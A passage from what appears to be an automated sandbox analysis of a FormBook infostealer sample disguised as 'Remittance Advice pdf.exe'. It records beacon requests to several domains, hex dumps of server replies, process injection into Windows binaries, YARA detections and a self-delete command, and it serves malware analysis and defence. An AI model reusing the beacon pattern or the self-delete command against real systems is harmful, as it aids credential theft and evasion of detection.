                                                      Host: www.gazipasadan.xyz
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 3, 2021 18:52:09.669857979 CEST5256INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Server: Microsoft-IIS/10.0
                                                      X-Powered-By: ASP.NET
                                                      Date: Mon, 03 May 2021 16:51:49 GMT
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.64974723.227.38.7480C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 3, 2021 18:52:14.830010891 CEST5267OUTGET /nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI HTTP/1.1
                                                      Host: www.sewadorbsclothing.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 3, 2021 18:52:15.030989885 CEST5268INHTTP/1.1 403 Forbidden
                                                      Date: Mon, 03 May 2021 16:52:15 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      X-Sorting-Hat-PodId: 152
                                                      X-Sorting-Hat-ShopId: 46991638681
                                                      X-Dc: gcp-us-central1
                                                      X-Request-ID: 1ab36600-2620-4bd7-bc46-50a165daab9f
                                                      X-Permitted-Cross-Domain-Policies: none
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      CF-Cache-Status: DYNAMIC
                                                      cf-request-id: 09d4be1d9000004a5bacb73000000001
                                                      Server: cloudflare
                                                      CF-RAY: 649affa8ebb54a5b-FRA
                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.649748199.59.242.15380C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      May 3, 2021 18:52:20.562289953 CEST5274OUTGET /nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI HTTP/1.1
                                                      Host: www.fux.xyz
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      May 3, 2021 18:52:20.687510014 CEST5275INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Mon, 03 May 2021 16:52:20 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0INvKxgR4jaSzpXDwhG9on1VVUxBPVbXeW2Cx2QhhVNzcgWueB4u/yGXMNIbx5UDKtTIPt32/R5LnmW81lkp3w==
                                                      Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 30 49 4e 76 4b 78 67 52 34 6a 61 53 7a 70 58 44 77 68 47 39 6f 6e 31 56 56 55 78 42 50 56 62 58 65 57 32 43 78 32 51 68 68 56 4e 7a 63 67 57 75 65 42 34 75 2f 79 47 58 4d 4e 49 62 78 35 55 44 4b 74 54 49 50 74 33 32 2f 52 35 4c 6e 6d 57 38 31 6c 6b 70 33 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                      Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0INvKxgR4jaSzpXDwhG9on1VVUxBPVbXeW2Cx2QhhVNzcgWueB4u/yGXMNIbx5UDKtTIPt32/R5LnmW81lkp3w=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                      HTTPS Packets

                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                      May 3, 2021 18:51:09.671597004 CEST162.159.130.233443192.168.2.649722CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                      CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:18:50:26
                                                      Start date:03/05/2021
                                                      Path:C:\Users\user\Desktop\Remittance Advice pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\Remittance Advice pdf.exe'
                                                      Imagebase:0x400000
                                                      File size:771072 bytes
                                                      MD5 hash:F597D74F90311FA86A708B211892D76F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:Borland Delphi
                                                      Reputation:low

                                                      General

                                                      Start time:18:51:12
                                                      Start date:03/05/2021
                                                      Path:C:\Windows\SysWOW64\DpiScaling.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\DpiScaling.exe
                                                      Imagebase:0x11a0000
                                                      File size:77312 bytes
                                                      MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:51:17
                                                      Start date:03/05/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:
                                                      Imagebase:0x7ff6f22f0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:51:42
                                                      Start date:03/05/2021
                                                      Path:C:\Windows\SysWOW64\autofmt.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                      Imagebase:0xac0000
                                                      File size:831488 bytes
                                                      MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:51:42
                                                      Start date:03/05/2021
                                                      Path:C:\Windows\SysWOW64\WWAHost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                      Imagebase:0x240000
                                                      File size:829856 bytes
                                                      MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:51:46
                                                      Start date:03/05/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Windows\SysWOW64\DpiScaling.exe'
                                                      Imagebase:0x2a0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:51:47
                                                      Start date:03/05/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff61de10000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >